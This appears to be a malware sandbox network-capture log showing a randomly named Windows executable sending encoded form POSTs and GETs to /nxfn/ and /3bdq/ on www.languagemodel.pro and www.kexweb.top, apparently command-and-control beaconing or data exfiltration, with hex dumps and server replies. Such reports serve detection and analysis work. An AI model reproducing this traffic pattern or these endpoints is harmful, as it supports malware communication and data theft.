                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 45 6a 2f 37 35 2b 57 4e 42 59 77 42 36 46 2b 31 6e 4d 53 55 79 52 6a 2f 67 51 50 2b 68 41 66 4d 76 70 32 54 71 64 63 44 2b 6b 69 45 56 61 6d 38 73 4c 70 58 45 4e 55 59 2f 4e 56 31 6b 72 6c 65 51 55 79 59 63 6f 62 64 6c 63 70 78 63 72 4e 4e 4c 6e 59 30 41 5a 53 42 4d 4a 39 59 4b 6c 50 6f 32 4a 79 33 70 68 34 73 66 42 43 61 4f 34 42 68 2f 6c 41 2f 4f 45 51 6d 53 6f 71 75 41 59 54 77 6b 4c 39 70 42 6a 74 35 4d 4b 56 33 5a 48 76 6d 36 4f 78 35 79 71 51 37 75 50 77 76 34 57 4b [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Ej/75+WNBYwB6F+1nMSUyRj/gQP+hAfMvp2TqdcD+kiEVam8sLpXENUY/NV1krleQUyYcobdlcpxcrNNLnY0AZSBMJ9YKlPo2Jy3ph4sfBCaO4Bh/lA/OEQmSoquAYTwkL9pBjt5MKV3ZHvm6Ox5yqQ7uPwv4WKu0SqE1/nDg8hqTgJcJ49QFg2rxtk/EreMQu1tjXuPPfVYmWUO/bYZmpJZkWprQ83eVnuih2QWQNuRo0TUcSWl902BP27oCWOtyKCe2iulkQzWX85GNKevpPr/5xvpzNxVMNP3hJTD2Z53SbryNbsC22obp+yuOgY4C9JGnkIP1v5RsLqr5/puEhTnsFxASReuL8xm/5gMkjOljjBJOnwYdf5X+bGeKVk1224KS78gDN4VnSC26cIxKpqUgC0Cabm3ZdYG7z+wqm7zwy6TFguDy+OWxdSn8kRQMoVzsEqkU/O0P7DBVKX1HHYUl6lds2glM5NzMumyrY99LLQCTmWWXPzaVbigFCof9uSZHJNla1T0EBOgzOKLO0PNDzGXv0CflLiYt2ZYhg1X3hhyA0CLR/lSack9SNHzx6om5tYHAgWXKH+DI1chzQqJSlCQR4YcNMEZJdoYQxFAaXP6MR4U4LnUrV4l2Nzgk3DMS8zKN/gTFPRynD6s+Rvmsu+IMzK6aOya6mgPfQ4aHqjfwE0+rT3bocsGNpVtJ67IAFTiSpamPsKF8+EjIr/u07504Kvkb7X/S8osD1xHo20KQ8ESjltX9jmVRGfA2WfZmjsKjbZ5ZR5x9byeXDYR8oVO95FP43m2IGlfUXCfx3XhJG3cJML5LtmL2nD21 [TRUNCATED]
                                                                        Oct 8, 2024 16:35:13.135819912 CEST713INHTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Oct 8, 2024 16:35:13.136502981 CEST713INHTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                        Oct 8, 2024 16:35:13.137814045 CEST713INHTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.450020217.70.184.50802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:14.043005943 CEST560OUTGET /nxfn/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:35:14.672527075 CEST1236INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:14 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Vary: Accept-Language
                                                                        Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                                        Oct 8, 2024 16:35:14.672616005 CEST914INData Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                        Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.45002163.250.47.40802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:21.067187071 CEST806OUTPOST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 77 74 32 35 35 2b 75 6f 49 6d 65 59 63 39 71 4d 54 6b 77 6e 35 37 55 76 76 6a 4f 42 76 67 72 7a 41 3d 3d
                                                                        Data Ascii: -NnllVvH=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2Nkxlqwt255+uoImeYc9qMTkwn57UvvjOBvgrzA==
                                                                        Oct 8, 2024 16:35:21.787060976 CEST595INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:21 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.45002263.250.47.40802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:23.621690035 CEST826OUTPOST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 66 6e 79 6f 71 36 4d 73 64 69 6f 45 41 6b 47 53 4a 55 34 49 61 38 67 35 57 44 31 4b 74 52 34 78 49 3d
                                                                        Data Ascii: -NnllVvH=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15fnyoq6MsdioEAkGSJU4Ia8g5WD1KtR4xI=
                                                                        Oct 8, 2024 16:35:24.220685005 CEST595INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:24 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.45002363.250.47.40802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:35:26.255626917 CEST10908OUTPOST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 51 4e 4b 68 49 62 38 73 61 32 65 4a 66 42 61 77 32 41 2b 41 78 70 2f 76 4a 79 73 73 37 33 48 73 4c 46 48 72 6e 71 59 30 61 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 44 6a 51 33 75 69 78 4b 4b 43 6c 35 72 33 57 31 2f 63 35 42 66 6f 37 63 48 4f 71 51 58 4c 52 41 7a 52 71 57 32 72 50 73 48 61 44 4e 67 6d 38 6a 51 2b 2b 78 72 4d 6e 73 59 6c 33 57 2f 52 2f 76 6a 32 6d 4e 49 59 78 6e 44 31 6b 38 6d 71 [TRUNCATED]
